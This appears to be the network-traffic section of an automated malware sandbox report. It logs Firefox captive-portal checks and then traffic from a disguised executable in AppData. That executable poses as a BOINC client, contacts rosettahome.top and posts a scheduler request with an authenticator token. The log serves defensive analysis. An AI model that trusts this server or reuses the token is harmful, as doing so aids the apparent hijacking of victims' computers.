                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:46:17.044059038 CET | 303 | OUT | GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:46:17.139887094 CET | 298 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80142
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:46:27.142641068 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
Jan 14, 2025 20:46:37.148758888 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
Jan 14, 2025 20:46:45.993488073 CET | 303 | OUT | GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:46:46.092423916 CET | 298 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80171
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:46:56.096714973 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
Jan 14, 2025 20:47:06.116811991 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
Jan 14, 2025 20:47:16.127939939 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
Jan 14, 2025 20:47:26.142843008 CET | 6 | OUT | Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:36.156897068 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.16 | 49741 | 34.107.221.82 | 80 | 876 | C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:45:17.255976915 CET | 305 | OUT | GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.16 | 49742 | 34.107.221.82 | 80 | 876 | C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:45:17.461796045 CET | 305 | OUT | GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:45:17.929651022 CET | 215 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8847
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 73 75 63 63 65 73 73 0a
Data Ascii: success
Jan 14, 2025 20:45:27.778038025 CET | 305 | OUT | GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:45:27.938069105 CET | 215 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8857
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 73 75 63 63 65 73 73 0a
Data Ascii: success
Jan 14, 2025 20:45:29.925513983 CET | 305 | OUT | GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:45:30.024449110 CET | 215 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8859
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 73 75 63 63 65 73 73 0a
Data Ascii: success
Jan 14, 2025 20:45:30.272217989 CET | 305 | OUT | GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:45:30.371148109 CET | 215 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8860
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
Jan 14, 2025 20:45:32.204768896 CET 305 OUT GET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Jan 14, 2025 20:45:32.304804087 CET 215 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8862
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
Jan 14, 2025 20:45:34.844511032 CET 305 OUT GET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Jan 14, 2025 20:45:34.957496881 CET 215 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8864
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
Jan 14, 2025 20:45:37.445352077 CET 305 OUT GET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Jan 14, 2025 20:45:37.544465065 CET 215 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8867
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
Jan 14, 2025 20:45:42.530268908 CET 305 OUT GET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Jan 14, 2025 20:45:42.630106926 CET 215 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8872
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
Jan 14, 2025 20:45:44.700100899 CET 305 OUT GET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.799429893 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8874
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:49.026921988 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:49.126988888 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8879
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:51.513211966 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:51.612582922 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8881
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:01.615540981 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.602602005 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.701710939 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 17:17:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 8895
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:14.819272041 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:46:15.046530008 CET  215  IN  HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8904
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 73 75 63 63 65 73 73 0a
Data Ascii: success
Jan 14, 2025 20:46:17.142991066 CET  305  OUT  GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:46:17.242892981 CET  215  IN  HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8907
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 73 75 63 63 65 73 73 0a
Data Ascii: success
Jan 14, 2025 20:46:27.250646114 CET  6  OUT  Data Raw: 00
Data Ascii:
Jan 14, 2025 20:46:37.258672953 CET  6  OUT  Data Raw: 00
Data Ascii:
Jan 14, 2025 20:46:46.095351934 CET  305  OUT  GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:46:46.194338083 CET  215  IN  HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 17:17:50 GMT
Age: 8936
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 73 75 63 63 65 73 73 0a
Data Ascii: success
Jan 14, 2025 20:46:56.207792997 CET  6  OUT  Data Raw: 00
Data Ascii:
Jan 14, 2025 20:47:06.226804972 CET  6  OUT  Data Raw: 00
Data Ascii:
Jan 14, 2025 20:47:16.238934040 CET  6  OUT  Data Raw: 00
Data Ascii:
Jan 14, 2025 20:47:26.254053116 CET  6  OUT  Data Raw: 00
Data Ascii:
Jan 14, 2025 20:47:36.266885996 CET  6  OUT  Data Raw: 00
Data Ascii:


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
5  192.168.2.16  49813  104.238.61.8  80  1276  C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
Timestamp  Bytes transferred  Direction  Data
Jan 14, 2025 20:46:33.504070044 CET  147  OUT  GET /rosettahome/ HTTP/1.1
Host: rosettahome.top
User-Agent: BOINC client (windows_x86_64 8.0.2)
Accept: */*
Accept-Encoding: deflate, gzip
Jan 14, 2025 20:46:34.085891008 CET  1236  IN  HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 19:46:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 UTC
Last-Modified: Tue, 14 Jan 2025 19:46:34 UTC
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1512
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 19 5d 73 d3 38 f0 bd bf 42 18 ee 5e 38 c7 49 e1 3e e8 39 61 7a a1 43 cb 94 36 d3 16 18 ee 25 a3 d8 1b 5b 45 b6 74 92 dc 90 fb f5 b7 92 ed c4 4e 93 52 38 33 25 d3 c4 96 b4 da ef 5d ad b6 e1 a3 57 e7 e3 ab 8f 93 23 92 9a 8c 8f f6 48 f5 09 ed 90 70 9a 27 43 0f 72 af b9 00 34 2e 87 eb b9 0c 0c 25 39 cd 60 e8 dd 30 58 48 a1 8c 47 22 91 1b c8 cd d0 5b b0 d8 a4 c3 18 6e 58 04 be 1b fc 42 58 ce 0c a3 dc d7 11 e5 30 1c 54 04 f6 c2 47 be 4f 42 1d a5 10 17 1c d4 28 35 46 1e 04 81 12 1a 8c a1 a9 c8 a0 67 84 6c 8e a7 51 c2 02 fc 86 c1 7a 17 f1 fd d1 5e c8 59 fe 89 28 e0 43 6f 26 58 1e 4d 57 eb 1e 49 15 cc 87 de fd 91 37 e5 37 cc 70 18 5d 1c 4d 4e 0f c7 47 e4 c3 c9 d5 31 99 5c 9c bf 39 1a 5f 91 b3 c3 b7 47 61 50 02 ec 6d 68 27 4a a9 42 bc 43 af 30 73 ff 0f 6f 43 83 0e ce 31 6c 96 12 b5 68 e0 b3 09 22 ad bd 52 00 6d 96 1c 74 0a 60 ee e0 3d ca 9b c3 20 98 09 61 b4 51 54 f6 32 96 f7 1c b2 0c 62 46 87 1e e5 bc 21 d1 5e 9b 01 4b 90 72 03 2a a7 06 2a 76 a8 94 9c 45 d4 30 81 34 b4 7e fa [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ]s8B^8I>9azC6%[EtNR83%]W#Hp'Cr4.%9`0XHG"[nXBX0TGOB(5FglQz^Y(Co&XMWI77p]MNG1\9_GaPmh'JBC0soC1lh"Rmt`= aQT2bF!^Kr**vE04~9qrK1D0($STlp&%p?<9?,-kgOZ"/~?v~$7@;t:8z`@As^;dYRC@Kkvq6`S*rpMz2FaNWDuF)~sZp9W/5KmpV#'$}L T4Ujz4_9:F70(EYL3E/]VP^6Zm,zhQ]JX,Zn.n7jkDkveGTa5|CF};}3~N;vV`4c<y`HVW/u1_r;0yhP7PS8nSAT8LuCu")GVK'H&b Z"O6oe1_V`|UdS[
Jan 14, 2025 20:46:34.085921049 CET | 646 | IN | (response body, continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.16 | 49816 | 104.238.61.8 | 80 | 1276 | C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:46:40.853033066 CET | 6061 | OUT | POST /rosettahome_cgi/cgi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.top
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Content-type: text/xml
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 5860
Data Ascii:
<scheduler_request>
    <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>
    <hostid>0</hostid>
    <rpc_seqno>0</rpc_seqno>
    <core_client_major_version>8</core_client_major_version>
    <core_client_minor_version>0</core_client_minor_version>
    <core_client_release>2</core_client_release>
    <resource_share_fraction>1.000000</resource_share_fraction>
    <rrs_fraction>1.000000</rrs_fraction>
    <prrs_fraction>1.000000</prrs_fraction>
    <duration_correction_factor>1.000000</duration_correction_factor>
    <allow_multiple_clients>0</allow_multiple_clients>
    <sandbox>0</sandbox>
    <dont_send_work>0</dont_send_work>
    <work_req_seconds>1.000000</work_req_seconds>
    <cpu_req_secs>1.000000</cpu_req_secs>
